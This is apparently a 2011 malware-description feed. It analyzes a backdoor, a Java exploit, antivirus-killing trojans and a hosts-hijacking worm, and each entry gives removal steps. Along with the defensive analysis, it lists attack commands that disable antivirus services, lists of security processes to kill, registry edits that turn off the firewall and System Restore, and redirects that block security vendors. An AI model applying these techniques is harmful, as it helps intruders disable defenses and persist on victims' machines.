Total Malware Info Feed

Backdoor.Win32.Buterat.cek

Playrhyba — Sun, 25 Sep 2011 16:38:50 +0300

The description for NewsChannel was created during beta-test of «Malware description on demand» service. Learn more about at: www.dnt-lab.com/en/services.

NewsChannel
Last edited:	26.5.2012

It is a malicious program that provides an attacker with remote access to an infected machine. It is a Windows application (PE-EXE file). Its size is 53,248 bytes. It is packed with UPX and an unknown packer. Its unpacked size is about 181 KB. It is written in C++.

MD5: 6BD27CD6F02511AF244EB85FA32BB01F

SHA1: BA245BA6AE566D8D8EC76836835846C8E7815F72

Installation

A copy of the backdoor can be created in the system with one of the following names:

%System%\netprotocol.exe
%APPDATA%\netprotocol.exe

At the same time to counteract the anti-virus signature scanners, 2 bytes are modified in the created copy:

To automatically start the copy every time you start the system backdoor creates the system registry keys:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Netprotocol" = <path to a created copy>
 
[HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
"Netprotocol" = <path to a created copy>

Next, the created copy of the malware will be executed.

Payload

Once launched, the backdoor requests settings to configure its further work from an attacker's server. The received data is stored in the file:

%WorkDir%\System.log

In order to identify its presence in the system it creates the system registry key:

[HKLM\Software\Microsoft\Netprotocol]
"UniqueNum" = "<number>"

where <number> - decimal number that is generated based on the current system time.

Backdoor connects to the following servers to receive an attacker's commands:

http://kre****amdx.com/
http://kas****euk.com/
http://cl****na.com/
http://co****.be/

Requests to the attacker's server may have the following format:

- The request for a new attacker's command:

<server>/njob.php?num=%s&rev=%s

- The confirmation of execution of a regular command:

<server>/nconfirm.php?rev=%s&code=%s&param=%s&num=%s
<server>/zconfirm.php?rev=%s&code=%s&site=%s&searches=%s&clicks=%s&adver=%s&num=%s

The backdoor is able to process commands with the following names:

JOB FILE
ZORKASITE
BEGUNFEED
REKLOSOFT
TEASERNET
SUPERPOISK
DIRECTST
LIVINETCH
PARKING
UPDATE
DOWNRUN
PRIORITYHOST
SETSTPAGE
COOKREJCT
DESTROY

Depending on the received commands the backdoor can execute the following actions on the infected system:

It changes a start page, as well as page of default search engine in the browsers:

Internet Explorer
Opera
Mozilla Firefox

For this purpose it changes the values of the following registry keys:

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Start Page" = "http://webvolta.ru"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3B}]
"DisplayName" = "Webvolta"
"URL" = "http://webvolta.ru/search.php?q={searchTerms}"

Also the following files can be created:

%System%\operaprefs_fixed.ini

This file contains the following strings:

[User Prefs]
Startup Type = 2
Home URL = http://webvolta.ru

%APPDATA%\Mozilla\Firefox\Profiles\searchplugins\webvolta.xml

This file contains the following strings:

SearchPlugin xmlns="http://www.mozilla.org/2006/browser/search/
ShortName
Webvolta
/ShortName
Description
Webvolta search.
/Description
InputEncoding
windows-1251
/InputEncoding
Url type="text/html" method="GET" template="http://webvolta.ru/search.php?
Param name="q" value="{searchTerms}"/
/Url
/SearchPlugin

Also the backdoor can create the file:

%APPDATA%\Mozilla\Firefox\Profiles\<rnd>.default\user.js

with the following contents:

user_pref("dom.disable_window_status_change", false);
user_pref("startup.homepage_override_url", "%s");
user_pref("browser.startup.page", 1);
user_pref("browser.startup.homepage", "%s");
user_pref("browser.search.selectedEngine", "Webvolta");

It downloads files from the attacker's server and execute them.
It embeds the java script designed to display ads from the resource "http://begun.ru" in the user-opened HTML-documents.
It "cheats" sites usage statistics. The backdoor receives retrieval requests and links to resources which ratings are necessary to improve.
Calling the function "InternetClearAllPerSiteCookieDecisions", it clears the contents of the branch in the registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\P3P\History]

Calling the function "InternetSetPerSiteCookieDecisionW", it rejects cookies for the domain "begun.ru".
It updates its executable from an attacker's server. Additionally, it can download a file that is stored in its working directory as

%WorkDir%\netprotdrvss.exe

Also, the backdoor updates its executable from an attacker's server being launched with the parameter:

/Updatefile3

Removal Instructions

If your computer was not protected by an antivirus and was infected with this malware, follow these steps to remove it:

1. Restart the computer in "Safe Mode" (at the beginning of loading press and hold «F8», then select «Safe Mode» at the Windows boot menu).

2. Delete the following files:

%System%\netprotocol.exe
%APPDATA%\netprotocol.exe
%WorkDir%\System.log
%System%\operaprefs_fixed.ini
%APPDATA%\Mozilla\Firefox\Profiles\searchplugins\webvolta.xml
%APPDATA%\Mozilla\Firefox\Profiles\<rnd>.default\user.js
%WorkDir%\netprotdrvss.exe

3. Delete the system registry keys:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Netprotocol" = <path to a created copy>
 
[HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
"Netprotocol" = <path to a created copy>
 
[HKLM\Software\Microsoft\Netprotocol]
"UniqueNum" = "<number>"

4. Restore the original registry key values:

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Start Page"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3B}]
"DisplayName"
"URL"

5. Delete the original backdoor's file (its location on the infected computer will depend on how the program originally penetrated the victim machine).

6. Clear the Temporary Internet Files directory, which may contain infected files.

7. Perform a full system scan with an antivirus with updated databases.

Can't find a description for a specific malware?
You can order a description for any computer malware, virus, trojan or worm.

Exploit.Java.CVE-2010-4452.a

Playrhyba — Sun, 18 Sep 2011 21:40:17 +0300

The description for NewsChannel was created during beta-test of «Malware description on demand» service. Learn more about at: www.dnt-lab.com/en/services.

NewsChannel
Last edited:	26.5.2012

The malicious program is an exploit, which uses vulnerability CVE-2010-4452 in Sun Java Runtime Environment (JRE) in the Oracle Java SE (up to version 6, 23rd Update) to download files from the Internet and execute them on the infected machine. It is s a Java-class (class-file). Its size is 3,570 bytes.

MD5: 388B61750499659F8339F0FB6FDCA7A4

SHA1: 0E60E6009B58331BF7E91329E0E4D33D0D33B803

Payload

The malware class "options" is an implementation of Java-applet designed to downloading files from passed URLs, as well as launching downloaded files It is launched from an infected HTML-page by using the "<APPLET>" tag. The list of URLs is passed to malicious applet as the tag parameter "uid" in encrypted form. Links in this list are separated by the symbols ";". Once launched, the exploit decrypts a received links by using the function "sicqsicT" declared in the malware class. During decoding, the following correspondence between input and output symbols is used:

Input symbols:

7It?w8HBF45P:v6Z3ihx1bTlsr.OEcRU2aY&m=_Dy#kSN/-fp;dVWgQJjAenC9M%zXKG0qLou

Output symbols:

0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ/.:_-?&=%#;

The malicious applet uses the vulnerability CVE-2010-4452 for the purpuse of downloading files from the Internet to an infected computer. This vulnerability allows an attacker to bypass security settings of Java Sandbox and execute malicious code on a vulnerable system. The downloaded files are stored under random names in the temporary folder of the current user "%Temp%":

%Temp%\<rnd>.exe

where <rnd> - random fractional decimal numbers from 0 to 1.

This file is launched after the successful download.

Removal Instructions

If your computer was not protected by an antivirus and was infected with this malware, follow these steps to remove it:

1. Delete the following files:

%Temp%\.exe

2. Update Sun Java JRE to the latest version.

3. Perform a full system scan with an antivirus with updated databases.

Can't find a description for a specific malware?
You can order a description for any computer malware, virus, trojan or worm.

Trojan.Win32.Yakes.buh

Playrhyba — Sun, 11 Sep 2011 23:34:34 +0300

The description for NewsChannel was created during beta-test of «Malware description on demand» service. Learn more about at: www.dnt-lab.com/en/services.

NewsChannel
Last edited:	26.5.2012

It is a trojan program that performs destructive actions on a user's computer. It is a Windows application (PE EXE-file). Its size is 57,480 bytes. It is written in C++.

MD5: E9DC8EBABDC9A2FD571885909DA8CC0D

SHA1: A7AC04CCC620A1703F20234CB27D11E70F49B4CC

Installation

The trojan copies its body to the Windows system directory. If it can't create a copy in the Windows system directory, the copy will be created in the temporary directory of the current user:

%System%\ms<rnd>.exe
%Temp%\ms<rnd>.exe

where <rnd> - any sequence of numbers and letters of the alphabet, for example, "vgzcjw" or "ngszup". In order to start automatically each time you start the system, the trojan creates a system service that runs its executable:

[HKLM\System\CurrentControlSet\Services\Network Adapter Events]

Payload

Once launched the trojan performs the following actions:

It creates a unique identifier with the following name to control uniqueness of its process:

msrdp#v3.2.4

It stops and deletes the following services:

Norton Antivirus Service
Panda Antivirus
Detector de OfficeScanNT
McAfee Framework Service
sharedaccess
OutpostFirewall
lnsfw1
sfilter
SmcService
UmxPol
UmxLU
UmxAgent
UmxCfg
kmxagent
kmxbig
kmxcfg
kmxfile
kmxfw
kmxids
kmxndis
kmxsbx
ZoneAlarm
vsmon
vsdatant
IswSvc
ISWKL
klif
klpf
klpid
kl1
WinDefend
MpsSvc
BFE
F-Secure Filter
F-Secure Gatekeeper
F-Secure HIPS
F-Secure Recognizer
fsbts
FSFW
F-Secure Gatekeeper Handler Starter
FSDFWD
FSMA
FSORSPClient

It creates a user named:

TermUser

and adds this user to the groups:

Administrators
Remote Desktop Users

It disables the display of the user's name in the Welcome Screen. For this purpose it creates the registry key:

[HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]
"TermUser" = "0"

It scans removable drives, and copies the files which extensions are different from the following:

7z
ace
ain
arc
arh
ari
arj
ark
boo
bz2
bzip
bzip2
deb
dist
gzip
hpk
ice
lha
lzh
lzma
pack.gz
package
pak
pkg
r00
r01
r02
r03
r21
r30
rar
rpm
tar
tar.xz
tbz
tbz2
tgz
uha
wad
zip
zoo
aac
aax
ac3
acm
aif
aifc
aiff
amf
amr
ams
amz
ape
apf
cda
cdda
cdr
dts
dtshd
flac
m1a
m3u
m4a
m4b
m4p
m4r
mid
midi
miniusf
mka
mod
mp_
mp1
mp2
mp3
mpa
mpc
mpga
ogg
pcm
pls
ram
snd
voc
vox
wav
wave
wma
wpk
wproj
3g2
3gp
3gp2
3gpp
amv
amx
asf
asx
avi
d3v
divx
dv4
dvr-ms
dvx
flc
flv
hdmov
ifo
imoviep
m1pg
m1v
m21
m2a
m2t
m2ts
m2v
m4e
m4u
m4v
mj2
mjp
mjpg
mkv
mov
movie
mp21
mp2v
mp4
mp4v
mpeg
mpeg4
mpg
mpg2
msdvd
mswmm
ogm
ogv
ogx
playlis
prproj
qtch
rts
swf
vid
vob
vp3
vp6
vp7
wmmp
wmv
wmx
wp3
xvid
ac5
ac6
acr
catpart
exif
ilbm
ithmb
jiff
kodak
odif
picnc
pictclipping
pspimage
qtif
spiff
suniff
tddd
trif
xbm
xpm
agif
albm
apng
art
artwork
blkrt
bm2
bmp
djvu
icon
ico
jb2
jpe
jpeg
jpg
pcx
png
psd
sumo
thumb
tif
tiff
wbmp
gif
design
drwdot
emf
eps
epsf
fh10
fh11
ft10
ft11
slddrt
slddrw
svg
3dmf
3ds
3dxml
asat
blend
catproduct
dwg
md5anim
md5mesh
model
sldasm
sldprt
truck
openbsdcmd
bat
ex_
exe
exopc
gadget
jse
pif
vbs
vbscript
widget
dll

Also this files must be smaller than 10 MB. The trojan saves the copies in the directory:

%System%\storage\<rnd>\

where <rnd> - volume serial number of a removable media.

It checks for a connection to the Internet by accessing the following URLs:

www.microsoft.com
www.yahoo.com
www.msn.com

To receive commands, the trojan sends the request to one of the following URLs:

z***b-went.info
oc***a-tcipty.com
oc***a-tc.info
h***j-emvbim.com
e***g-bjsyfjoqt.info
e***g-bjsyf.com
xl***ju-lrychj.info
xl***ju-lr.com
m***o-jragnrw.info
m***o-jra.com
f***hrc-tzgk.info
cq***oz-qwdhmor.com
cq***oz-qwd.info
vj***h-ajpwafh.com
vj***h-ajp.info
ky***wh-yelpu.com
ky***wh-y.info
dr***p-irxei.com
ao***m-foubfkmp.info
a***cm-foub.com
th***-qyhnuydf.info

The sent request contains the information about a user's computer, such as system locale, serial number of the volume of the system drive, computer name, user name, information that the trojan gets from the following registry keys:

[HKLM\Software\Microsoft\Cryptography]
"MachineGuid"
 
[HKLM\Software\Microsoft\Windows NT\CurrentVersion]
"ProductId"
 
[HKLM\Software\Microsoft\Windows NT\CurrentVersion]
"DigitalProductId"
 
[HKLM\Software\Microsoft\Windows NT\CurrentVersion]
"InstallDate"

as well as information about the installed security software from the following list:

Webroot
Sophos
Clam Antivirus
ClamWin
Avast 5
avast!

that the trojan gets from the following keys in the system registry:

[HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall]

The trojan saves its settings in an encrypted form in the registry key:

[HKLM\Software\Microsoft\TermServMonitor]

Following an attacker's command the trojan can download updates, download and execute components designed to provide access to the infected computer via RDP (Remote Desktop) protocol, as well as component for logging user actions.

The downloaded files are stored in the temporary directory of the current user:

%Temp%\win<rnd1>.tmp

where <rnd1> - any sequence of numbers and letters of the alphabet.

If the downloaded file is an archive containing the components to install, the trojan will create the directory and place the extracted files to this directory:

%Temp%\b<rnd2>\

where <rnd2> - any sequence of numbers and letters of the alphabet.

Then the trojan will install the downloaded components.

Removal Instructions

If your computer was not protected by an antivirus and was infected with this malware, follow these steps to remove it:

1. Using the system Task Manager terminate the trojan process.

2. Delete the original trojan file (its location on the infected computer will depend on how the program originally penetrated the victim machine).

3. Remove the following registry keys:

[HKLM\Software\Microsoft\TermServMonitor]
 
[HKLM\System\CurrentControlSet\Services\Network Adapter Events]
 
[HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]
"TermUser" = "0"

4. Remove the following files and directories:

%System%\ms<rnd>.exe
%Temp%\ms<rnd>.exe
%Temp%\win<rnd1>.tmp
%Temp%\b<rnd2>\

5. Remove the following user from the system:

TermUser

6. Perform a full system scan with an antivirus with updated databases.

Can't find a description for a specific malware?
You can order a description for any computer malware, virus, trojan or worm.

Trojan.Win32.KillAV.gdb

Playrhyba — Sun, 14 Aug 2011 16:53:19 +0300

The description for NewsChannel was created during beta-test of «Malware description on demand» service. Learn more about at: www.dnt-lab.com/en/services.

NewsChannel
Last edited:	26.5.2012

It is a trojan program that performs destructive actions on a user's computer. It is a Windows DLL (PE-DLL file). Its size is 9,728 bytes. It is written in C++.

MD5: 8E10BC3D3033A4FDC987F85C7FFA40FF

SHA1: 24DD370B3A6FF535A6A2468F9AA4AF801B62A053

Payload

The malicious DLL exports the function called "testall". This function implements a functionality described below.

If the process "avp.exe" is found in the infected system, the trojan will attempt to unload the following modules from address space of this process:

kavbase.kdl
webav.kdl
vlns.kdl
mark.kdl
klavemu.kdl
kjim.kdl

Then the trojan disables an automatic start of the service "avp". For this purpose the trojan runs the command:

sc config avp start= disabled

Then the process "avp.exe" is terminated by using the system utility "taskkill.exe":

taskkill.exe /f/t/im avp.exe

Next the trojan performs search and termination of the following processes:

avp.exe
safeboxTray.exe
360Safebox.exe
360tray.exe
antiarp.exe
ekrn.exe
RsAgent.exe
mfeann.exe
egui.exe
RavMon.exe
RavMonD.exe
RavTask.exe
CCenter.exe
RavStub.exe
RsTray.exe
ScanFrm.exe
Rav.exe
AgentSvr.exe
CCenter.exe
QQDoctor.exe
McProxy.exe
mcshield.exe
rsnetsvr.exe
naPrdMgr.exe
MpfSrv.exe
MPSVC.exe
MPSVC1.exe
KISSvc.exe
KPfwSvc.exe
kmailmon.exe
KavStart.exe
engineserver.exe
KPFW32.exe
KVSrvXP.exe
ccSetMgr.exe
ccEvtMgr.exe
defwatch.exe
rtvscan.exe
ccapp.exe
vptray.exe
mcupdmgr.exe
mfevtps.exe
mcsysmon.exe
mcmscsvc.exe
mcnasvc.exe
mcagent.exe
vstskmgr.exe
FrameworkService.exe
mcshell.exe
mcinsupd.exe
bdagent.exe
livesrv.exe
vsserv.exe
xcommsvr.exe
ccSvcHst.exe
SHSTAT.exe
McTray.exe
udaterui.exe
KAVStart.exe
Uplive.exe
KWatch.exe
QQDoctorRtp.exe
DrUpdate.exe
rfwsrv.exe
RegGuide.exe
MPSVC2.exe
MPMon.exe
LiveUpdate360.exe
rssafety.exe
KABackReport.exe
KSWebShield.exe
360delays.exe
qutmserv.exe
kaccore.exe
360SoftMgrSvc.exe
360realpro.exe
DSMain.exe
360sd.exe
360rp.exe
ZhuDongFangYu.exe
360safe.exe

In case of finding the processes:

360rp.exe
ravmond.exe

the trojan stops and deletes the services:

360rp
rsravmon

If the process "ekrn.exe" is found, the trojan will delete the service "ekrn" by using the following command:

cmd /c sc delete ekrn

If the process "avp.exe" is found, the trojan will run the commands:

cmd /c sc config avp start= disabled
taskkill.exe /im avp.exe /f

Thus, the trojan disables an automatic start of the service "avp" as well as terminates the process "avp.exe".

After this, the trojan terminates.

Removal Instructions

If your computer was not protected by an antivirus and was infected with this malware, follow these steps to remove it:

1. Delete the original trojan file (its location on the infected computer will depend on how the program originally penetrated the victim machine).

2. Perform a full system scan with an antivirus with updated databases.

Can't find a description for a specific malware?
You can order a description for any computer malware, virus, trojan or worm.

Trojan.Win32.Qhost.mme

Playrhyba — Sun, 07 Aug 2011 15:36:23 +0300

The description for NewsChannel was created during beta-test of «Malware description on demand» service. Learn more about at: www.dnt-lab.com/en/services.

NewsChannel
Last edited:	26.5.2012

It is a trojan program that performs destructive actions on a user's computer. It is a Windows application (PE-EXE file). Its size is 134,359 bytes. It is packed with an unknown packer. Unpacked size is about 446 KB. It is written in Delphi.

md5: 895A62F1F95FDE6B01810A7740549AAD

sha1: 598B0B98FA25902AE5434AE57127B8294868DD83

1 Installation
2 Payload
3 Spread Through Removable Devices and Network Resources
4 Removal Instructions

Installation

Once launched, the trojan copies its body to the following files:

%System%\Default.scr
%System%\config\lsass.exe
%System%\config\Cache\Dasktop.ini

The trojan sets "hidden" attribute for the copy "lsass.exe".

In order to start automatically each time you start the system, the trojan creates the links to its executable files in the system registry:

[HKCU\Control Panel\Desktop]
"SCRNSAVE.EXE" = "%System%\Default.scr"
 
[HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
"Intel Audio Driver" = "%System%\config\lsass.exe"

Payload

In order to counteract to monitoring and debugging tools, the trojan search for the following window classes:

OLLYDBG
FileMonClass

and devices:

\\.\SICE
\\.\SIWVID
\\.\NTICE
\\.\REGSYS
\\.\REGVXG
\\.\FILEVXG
\\.\FILEM
\\.\TRW
\\.\ICEEXT

It creates a unique identifier with the following name to control uniqueness of its process:

WOG_M

It blocks booting of a system in "Safe mode" by removing the following registry branches:

[HKLM\System\CurrentControlSet\Control\SafeBoot\Network]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal]

It turns off notifications of the Windows Security Center by setting the following parameters in the system registry:

[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallDisableNotify" = "1"
"FirewallOverride" = "1"

It disables the "Folder Options" item in Windows Explorer:

[HKLM\Software\Microsoft\Windows\CurrentVersion\policies\explorer\run]
"NoFolderoptions" = "1"

It disables the System Restore:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"DisableSR" = "1"
 
[HKCU\Software\Microsoft\Windows NT\CurrentVersion\systemrestore]
"DisableSR" = "1"

Launching of the following programs for the current user will be prohibited:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"DisallowRun" = "1"
 
[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Disallowrun]
0 = "avp.exe"
1 = "avz.exe"
2 = "autoruns.exe"
3 = "outpost.exe"
4 = "spidernt.exe"
5 = "SpyDerAgent.exe"
6 = "dwengine.exe"
7 = "spiderui.exe"
8 = "acs.exe"
9 = "op_mon.exe"
10 = "klnagent.exe"
11 = "egui.exe"
12 = "sched.exe"
13 = "avgnt.exe"
14 = "avguard.exe"
15 = "guardgui.exe"

It disables the Windows Firewall:

[HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StardardProfile]
"DisableNotifications" = "1"
"DoNotAllowExceptions" = "0"
"EnableFirewall" = "0"

It turns on the launching of screensaver and sets the time of its launch:

[HKCU\Control Panel\Desktop]
"ScreenSaveActive" = "1"
"ScreenSaveTimeOut" = "100"

The binary file of screensaver is a copy of the trojan.

It sets the low level of Windows security policy for files with the extensions "exe", "bat", "reg" and "scr" for the purpose of disabling a security messages during opening a file from the "untrusted" source:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Associations]
LowRiskFileTypes = ".Exe;.Bat;.Reg;.Scr;"
 
[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments]
SaveZoneInformation = "1"

The trojan modifies the files:

%System%\drivers\etc\hosts
%System%\dllcache\hosts

appending to them the following lines:

127.0.0.1 localhost
174.133.168.212 www.viruslist.com
174.133.168.212 www.kaspersky.ru
174.133.168.212 www.kaspersky.com
174.133.168.212 www.securelist.com
174.133.168.212 z-oleg.com
174.133.168.212 www.trendsecure.com
174.133.168.212 ftp.drweb.com
174.133.168.212 virusinfo.info
174.133.168.212 www.viruslab.ru
174.133.168.212 www.novirus.ru
174.133.168.212 online.drweb.com
174.133.168.212 www.informyx.ru
174.133.168.212 vms.drweb.com
174.133.168.212 stopvirus.ru
174.133.168.212 www.esetnod32.ru
174.133.168.212 devbuilds.kaspersky-labs.com
174.133.168.212 www.agnitum.ru
174.133.168.212 www.drweb.com
174.133.168.212 www.avirus.ru
174.133.168.212 dnl-00.geo.kaspersky.com
174.133.168.212 dnl-01.geo.kaspersky.com
174.133.168.212 dnl-02.geo.kaspersky.com
174.133.168.212 dnl-03.geo.kaspersky.com
174.133.168.212 dnl-04.geo.kaspersky.com
174.133.168.212 dnl-05.geo.kaspersky.com
174.133.168.212 dnl-06.geo.kaspersky.com
174.133.168.212 dnl-07.geo.kaspersky.com
174.133.168.212 dnl-08.geo.kaspersky.com
174.133.168.212 dnl-09.geo.kaspersky.com
174.133.168.212 dnl-10.geo.kaspersky.com
174.133.168.212 dnl-11.geo.kaspersky.com
174.133.168.212 dnl-12.geo.kaspersky.com
174.133.168.212 dnl-13.geo.kaspersky.com
174.133.168.212 dnl-14.geo.kaspersky.com
174.133.168.212 dnl-15.geo.kaspersky.com
174.133.168.212 dnl-16.geo.kaspersky.com
174.133.168.212 dnl-17.geo.kaspersky.com
174.133.168.212 dnl-18.geo.kaspersky.com
174.133.168.212 dnl-19.geo.kaspersky.com
174.133.168.212 dnl-20.geo.kaspersky.com
174.133.168.212 downloads1.kaspersky-labs.com
174.133.168.212 downloads2.kaspersky-labs.com
174.133.168.212 downloads3.kaspersky-labs.com
174.133.168.212 downloads4.kaspersky-labs.com
174.133.168.212 downloads5.kaspersky-labs.com
174.133.168.212 msk1.drweb.com
174.133.168.212 msk2.drweb.com
174.133.168.212 msk3.drweb.com
174.133.168.212 msk4.drweb.com
174.133.168.212 msk5.drweb.com
174.133.168.212 download.eset.com
174.133.168.212 u40.eset.com
174.133.168.212 u41.eset.com
174.133.168.212 u42.eset.com
174.133.168.212 u43.eset.com
174.133.168.212 u44.eset.com
174.133.168.212 u45.eset.com
174.133.168.212 u46.eset.com
174.133.168.212 u47.eset.com
174.133.168.212 u48.eset.com
174.133.168.212 u49.eset.com
174.133.168.212 u50.eset.com
174.133.168.212 u51.eset.com
174.133.168.212 u52.eset.com
174.133.168.212 u53.eset.com
174.133.168.212 u54.eset.com
174.133.168.212 u55.eset.com
174.133.168.212 u56.eset.com
174.133.168.212 u57.eset.com
174.133.168.212 u58.eset.com
174.133.168.212 u59.eset.com
174.133.168.212 um10.eset.com
174.133.168.212 um11.eset.com
174.133.168.212 um12.eset.com
174.133.168.212 um13.eset.com
174.133.168.212 um14.eset.com
174.133.168.212 um15.eset.com
174.133.168.212 um16.eset.com
174.133.168.212 um17.eset.com
174.133.168.212 um18.eset.com
174.133.168.212 um19.eset.com

The trojan reads a path to the hosts file from the registry key:

[HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters]
"DataBasePath"

Thus, when you try to access those resources the user will be redirected to:

174.133.168.212

After this, the trojan terminates.

In addition, the trojan disables the display of hidden and system files/directories, as well as display the extensions for registered file types in Windows Explorer. For this purpose it changes the values of the following registry keys:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"Hidden" = "0"
"ShowSuperHidden" = "0"
"HideFileExt" = "1"

It terminates the following processes:

procexp.exe
procmon.exe
autoruns.exe
KillProcess.exe
PrcInfo.exe
filemon.exe
regmon.exe
msconfig.exe
HiJackThis.exe
avz.exe
phunter.exe
UnlockerAssistant.exe
Unlocker.exe
regedit.exe
servise.exe
OS.exe
Prcview.exe
TaskInfo.exe
egui.exe
sysinspector.exe
klnagent.exe

It looking for the windows with the following class names:

PROCEXPL
PROCMON_WINDOW_CLASS
Autoruns
AVP.MainWindow
AnVirMainFrame
and the titles of windows:
avast! Antivirus Setup
Display Properties
AVZ antivirus utility
Avira AntiVir Personal - Free Antivirus
Dr.Web Security Space 5.0 - InstallShield Wizard

Then it identify processes that own these windows and terminates them.

It checks the header of an active window, if it coincides with the following, the trojan will define a process that owns this window and terminate it:

avast! Antivirus Setup
Свойства: Экран
Антивирусная утилита AVZ
Avira AntiVir Personal - Free Antivirus
Dr.Web Security Space 5.0 - InstallShield Wizard

Also, there is 7 audio fragments in the trojan's resources. These fragments is played during pressing the keys:

ENTER
BACKSPACE
TAB
ESC
DEL
CAPS LOCK
SPACE

Spread Through Removable Devices and Network Resources

The trojan сopies its executable file to all writable removable drives connected to the victim's computer:

<the infected partition's name>:\<rnd>.scr

Also the script "Autorun.inf" is created in the root directory of an infected disk:

<the infected partition's name>:\Autorun.inf

<rnd> - random sequence of numbers, for example, "47602". It provides for a copy to run each time a user opens an infected removable disk using "Explorer".

In addition, the worm applies the "hidden" attribute to all directories in the root of an infected removable disk. After that the worm creates copies of its executable on this disk under hidden directories' names.

The trojan copies its body to the available network resources by one of the following names:

XXX.scr                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                         Games.scr
Фотки.scr
Порно.scr
Музыка.scr
Не удалять!!!.scr
Новое.scr
Свежак.scr
это я)).scr
Книжки.scr
Антивирусы.scr
Новая папка.scr
сталкер.scr
каспер.scr
жесть.scr

Also, the trojan searches for exe files on available network resources. All found files will be renamed to

zw<the original file name>.exe

And the attribute "hidden" will be applied to these files.

Then it creates a copy of its body under the found files' names:

<the original file name>.exe

It also creates shortcuts:

<the original file name>.lnk

for the purpose of launching the trojan copies:

%WindDir%\system32\RunDll32.exe shell32.dll,ShellExec_RunDLL".\<the original file name>.exe"

Removal Instructions

If your computer was not protected by an antivirus and was infected with this malware, follow these steps to remove it:

1. Use the Task Manager to determine the PID of the trojan process:

lsass.exe

The trojan process is running on behalf of the current user.

2. Run the command:

taskkill /pid <PID of the trojan protsess>

3. Delete the following files:

%System%\Default.scr
%System%\config\lsass.exe
%System%\config\Cache\Dasktop.ini

4. Delete the system registry keys:


[HKCU\Control Panel\Desktop]
"SCRNSAVE.EXE" = "%System%\Default.scr"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Intel Audio Driver" = "%System%\config\lsass.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Disallowrun]
0 = "avp.exe"
1 = "avz.exe"
2 = "autoruns.exe"
3 = "outpost.exe"
4 = "spidernt.exe"
5 = "SpyDerAgent.exe"
6 = "dwengine.exe"
7 = "spiderui.exe"
8 = "acs.exe"
9 = "op_mon.exe"
10 = "klnagent.exe"
11 = "egui.exe"
12 = "sched.exe"
13 = "avgnt.exe"
14 = "avguard.exe"
15 = "guardgui.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Associations]
LowRiskFileTypes = ".exe;.bat;.reg;.scr;"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments]
SaveZoneInformation = "1"

5. If necessary, restore the values of the following system registry keys:

[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallDisableNotify" = "1"
"FirewallOverride" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\explorer]
"NoFolderoptions" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore]
"DisableSR" = "1"

[HKCU\Software\Microsoft\Windows NT\CurrentVersion\systemrestore]
"DisableSR" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"DisallowRun" = "1"

[HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StardardProfile]
"DisableNotifications" = "1"
"DoNotAllowExceptions" = "0"
"enableFirewall" = "0"

[HKCU\Control Panel\Desktop]
"ScreenSaveActive" = "1"
"ScreenSaveTimeOut" = "100"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"Hidden" = "0"
"ShowSuperHidden" = "0"
"HideFileExt" = "1"

6. Restore the original contents of the files:

%System%\drivers\etc\hosts
%System%\dllcache\hosts

7. Delete the original trojan file (its location on the infected computer will depend on how the program originally penetrated the victim machine).

8. Perform a full system scan with an antivirus with updated databases.

Can't find a description for a specific malware?
You can order a description for any computer malware, virus, trojan or worm.

Trojan-Downloader.Java.OpenConnection.er

Playrhyba — Sun, 31 Jul 2011 23:53:27 +0300

The description for NewsChannel was created during beta-test of «Malware description on demand» service. Learn more about at: www.dnt-lab.com/en/services.

NewsChannel
Last edited:	26.5.2012

The malicious program is an exploit, which uses vulnerability in Sun Java JRE and JDK to download files from the Internet and to execute them on the infected machine. It is a JAR-archive that contains a collection of Java-classes (class-files). Its size is 18,043 bytes.

MD5: B128448CE2DEC747EC806A47800F7100

SHA1: 82961301732E8AF889BDB1B7E50197C8B433BC5B

Payload

The malicious JAR-archive contains the following files:

bingo\chugun.class (365 bytes)
bingo\dipler.class (1,394 bytes)
 
bingo\efir.class (17,766 bytes; it is detected by Kaspersky Antivirus as "Trojan-Downloader.Java.OpenConnection.er")
 
bingo\haskalu.class (2,532 bytes)
bingo\kipoltyrew.class (856 bytes)
Meta-inf\Manifest.mf (71 bytes)

